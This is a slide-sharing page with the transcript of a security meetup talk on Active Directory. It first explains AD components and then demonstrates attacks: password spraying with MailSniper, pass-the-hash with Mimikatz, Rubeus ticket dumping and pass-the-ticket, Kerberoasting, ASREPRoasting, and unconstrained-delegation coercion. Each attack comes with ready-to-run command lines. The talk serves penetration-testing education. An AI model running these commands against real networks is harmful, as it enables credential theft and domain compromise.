Understanding Active Directory: Key Components and Security Considerations

Active Directory is a crucial component in Windows networks, providing centralized resource management, authentication, and authorization services. Key components include objects, domains, domain controllers, OUs, forests, and group policies. Understanding the data store, NTDS.dit file, partitions, and schema is essential for managing Active Directory effectively and ensuring security.

Download Presentation

Please find below an Image/Link to download the presentation.

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author. Download presentation by click this link. If you encounter any issues during the download, it is possible that the publisher has removed the file from their server.

• Active Directory
• Security
• Windows Networks
• Authentication
• Management

brynleigh Follow

Uploaded on Apr 16, 2024 | 6 Views

Presentation Transcript

1. Active Directory Attacks Security Boat Meetup November 2023

2. # whoami o Syed Modassir Ali aka. (@gr33nm0nk2802) o Offensive/Red Team Security Researcher o CTF Player o Pentester (Web, API, Infra, Wireless, Exploit Dev) o Security Consultant @Payatu o Security Researcher @Yogosha o Hold OSCP | CRTP | eCPPTv2 | CEH o Social handle - @gr33nm0nk2802

3. Why Active Directory?

5. Introduction to Active Directory o Active Directory is Microsoft s proprietary directory service for Windows networks. o Active Directory Domain Services ADDS o It provides a centralized way of managing resources (objects). Note: Everything in an Active Directory is an object. o ADDS provides Authentication and Authorization services. o Group Policy in ADDS allows admins to define and enforce security configurations. o DNS is tightly integrated with ADDS and is used to locate resources like Computers, Services etc., o ADDS uses Replication to synchronize data between Domain Controllers. o ADDS supports Trust relationships between domains, for secure communications. o Schema in ADDS defines the structure and attributes of objects stored in the directory. o Some of the Key components of Active Directory are- o Domains, Domain Controllers, Organizational Units (OUs), Forests, Trees (DNS), Domain Users, Groups, Global Catalog, Schema, Group Policy

6. Introduction to Active Directory

7. Key Components of Active Directory o Active Directory Data Store o Domain o Domain Controllers o Tree o Forest o Trusts o Organizational Units (OUs) o Group Policy o Containers

8. This Photo by Unknown Author is licensed under CC BY-SA-NC

9. Key Components Active Directory Data Store o The Active Directory data store is where all information about objects in the Active Directory (AD) is stored. It is essentially a database that holds data related to users, computers, groups, organizational units and other network resources. o NTDS.dit The NTDS.dit file is the core database file that stores the Active Directory data. o Located at default path C:\windows\NTDS\ntds.dit on the Domain Controller. o Default Partition - o Domain Partition (dc=domain,dc=com) It represents the naming context for a specific domain in the AD forest. o Schema Partition (cn=schema,dc=domain,dc=com) It stores forest-wide configuration information, including sites, services, and replication settings. o Configuration Partition (cn=configuration,dc=domain,dc=com) It defines structure and attributes of all objects in Active Directory forest.

10. Key Components Domain o Domains are logical groupings of network objects (users, computers, devices) that share a common directory database (NTDS.dit). o Each Domain has a unique name within an Active Directory Forest.

11. Key Components Domain Controller o Domain Controller are servers responsible for storing a writable copy of the Active Directory database, authenticating users and enforcing security policies. o DC runs services like Kerberos, LDAP(S), Global Catalog, Win-RM(http/https), etc. o Every Domain can have more than one domain controllers to avoid redundancy and Fault Tolerance. o When we have more than one DC, some are assigned Read Only Domain Controller (RODC)

12. Key Components Tree o In Active Directory, a Tree is a hierarchical arrangement of domains within a contiguous DNS namespace. Think of it as a family tree where each branch represents a different domain connected to a common root. o Domains within a tree share a common namespace but have unique names. Trees have a bidirectional trusts. o Root Domain: The top-level domain in the tree, serving as the anchor point for all other domains. o Child Domains: Domains created under the root domain, forming the branches of the tree.

13. Key Components Forest o In Active Directory, a Forest is a collection of one or more domain trees that share a common schema, configuration, and global catalog. Picture a vast, interconnected ecosystem where each tree represents a domain, and the entire landscape forms the forest. o All domains within a forest share the same schema (blueprints for objects) and configuration (settings and policies). o A forest has a single global catalog that contains information about objects across all domains. o A forest can consist of one or more domain trees, each with its root domain. Users in different trees within the same forest share a common identity, allowing seamless authentication.

14. Key Components Trusts o Trusts in Active Directory establish a secure relationship between domains, allowing users in one domain to access resources in another. o Unidirectional or Bidirectional: Trust relationships can be one-way (unidirectional) or two- way (bidirectional), depending on the needs. o Components Trusting Domain: The domain that trusts another domain. Trusted Domain: The domain that is trusted by another domain. o Trust Types External Trust: Established between domains in different forests. Forest Trust: Forms trust relationships between all domains in two forests. Shortcut Trust: Connects domains in the same forest but not in the same tree.

15. Key Components Organizational Units o Organizational Units (OUs) are containers within Active Directory that help organize and manage objects, such as users, computers, and groups. o OUs can represent different departments within an organization, allowing for tailored management. Useful for organizing resources. o OUs provide a granular level of management for objects, allowing administrators to apply specific settings.

16. Key Components Group Policy Object o Group Policy Objects (GPOs) are a powerful feature in Active Directory that allows administrators to define and enforce settings for users and computers. GPOs define configurations, security settings, and other policies for targeted sets of users and computers. GPOs are linked to Organizational Units (OUs) in a hierarchical manner, allowing for targeted policy application. o All DCs have a share that is readable by all domain users \\DOMAINNAME\SYSVOL\DOMAINNAME\Policies o On every Windows computer, Group Policy Client checks if there are new settings which should be applied. o Computer settings are applied on start-up and every 60 + offset mins later o User settings are applied upon logon and every 90 + offset mins later.

17. Key Components Containers o Containers in Active Directory are special objects that hold other objects, providing a way to organize and group related items. o Containers hold non-security principal objects, such as computer objects and group objects. o Unlike Organizational Units (OUs), containers have limited functionality and cannot have Group Policy Objects (GPOs) linked to them. o Container Types o Built-In Containers: Examples include the Users container and the Computers container. o Default Containers: Created by default in the Active Directory structure.

18. Common Protocols o ARP o DHCP o DNS o SMB o NBT-NS o LLMNR o WPAD o MS-RPC o LDAP o Kerberos o WMI o WinRM

20. Some Common Attacks o Password Spraying o Pass the Hash o Pass the Ticket o Overpass the Hash

21. Password Spraying o Password Spraying Attack is a type of brute force attack where a malicious actor attempts the same password on many accounts before moving on to another one and repeating the process. Tools like MailSniper and SprayingToolkit can help in this. o Import the MailSniper module. ipmo C:\Tools\MailSniper\MailSniper.ps1 o Enumerate the NETBIOS name Invoke-DomainHarvestOWA -ExchHostname <exchange-hostname> o Use Namemash to generate the all the possible usernames namemash.py names.txt > possible.txt

22. Password Spraying o Use timing-based attack to figure out the valid username Invoke-UsernameHarvestOWA -ExchHostname <exchange-hostname> -Domain <Domain-name> -UserList .\possible.txt -OutFile .\valid.txt o Use Password spray attack. Invoke-PasswordSprayOWA -ExchHostname <exchange-hostname> -UserList .\valid.txt -Password Summer2022

23. Password Spraying (Demo)

24. Pass the Hash o Pass the hash is a technique that allows you to authenticate to a Windows service using the NTLM hash of a user's password. It works by starting a new logon session with a fake identity and then replacing the session information with the domain, username and NTLM hash provided. o Pass The Hash using mimikatz Invoke-Mimikatz -Command '"sekurlsa::pth /user:<user> /domain:<currentdomain> /ntlm:<NTLM hash> /run:powershell.exe"'

25. Pass the Hash (Demo)

26. Pass the Hash (Demo)

27. Pass the Hash (Demo)

28. Pass the Ticket o Pass the ticket is a technique that allows you to add Kerberos tickets to an existing logon session (LUID) that you have access to, or a new one you create. Accessing a remote resource will then allow that authentication to happen via Kerberos. C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x5afb9 /service:krbtgt /nowrap C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /luid:0x41913d /ticket:dIFwj[...snip...]U8=

29. Pass the Ticket (Demo)

30. Pass the Ticket (Demo)

31. Pass the Ticket (Demo)

32. Pass the Ticket (Demo)

33. Pass the Ticket (Demo)

34. Overpass the Hash o Overpass the hash is a technique which allows us to request a Kerberos TGT for a user, using their NTLM or AES hash. Elevated privileges are required to obtain user hashes, but not to request a ticket. C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /ntlm:59fc0f884922b4ce376051134c71e22c /nowrap C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /aes256:4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c 6 /nowrap

35. Overpass the Hash (Demo)

36. Authentication in Windows

37. NTLM Authentication Source: https://tryhackme.com

38. Kerberos Authentication

39. Kerberos Authentication Source: https://tryhackme.com

41. Advanced Attacks o Kerberoasting o ASREPRoasting o Unconstrained Delegation o Constrained Delegation o DC Sync o Golden Ticket Attacks o ACL Abuse

42. Kerberoasting o Kerberoasting is a technique for requesting TGS for services running under the context of domain accounts and cracking them offline to reveal their plaintext passwords. C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samaccountname C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:mssqlsvc /nowrap john --format=krb5tgs --wordlist=wordlist hash.txt

43. Kerberoasting (Demo)

44. Kerberoasting (Demo)

45. ASREPRoasting o If a user does not have Kerberos pre-authentication enabled, an AS-REP can be requested for that user, and part of the reply can be cracked offline to recover their plaintext password of the user. C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=419 4304))" --attributes cn,distinguishedname,samaccountname C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:squid_svc /nowrap john --format=krb5asrep --wordlist=wordlist hash.txt

46. ASREPRoasting (Demo)

47. ASREPRoasting (Demo)

48. Unconstrained Delegation o Unconstrained Delegation is a special permission given to computers or users in the domain. Commonly Assigned to Computers like IIS01 running services such as IIS, MSSQL, etc. o These services often need to access a database or another server. When a user logs in, their authentication ticket (TGT) is saved in the computer's memory. This allows the computer to act as the user, accessing other services on their behalf. o User --- authenticates to ---> IIS server ---> authenticates on behalf of the user ---> DB server o Introduced in windows server 2000

49. Unconstrained Delegation o Query Computer with Unconstrained Delegation C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803: =524288))" --attributes samaccountname,dnshostname o Monitor for tickets at 10sec interval C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /interval:10 /nowrap o Force the DC to authenticate to the WEB machine. C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTr igger.exe dc-2.dev.cyberbotic.io web.dev.cyberbotic.io

50. Unconstrained Delegation (Demo)

Load More ...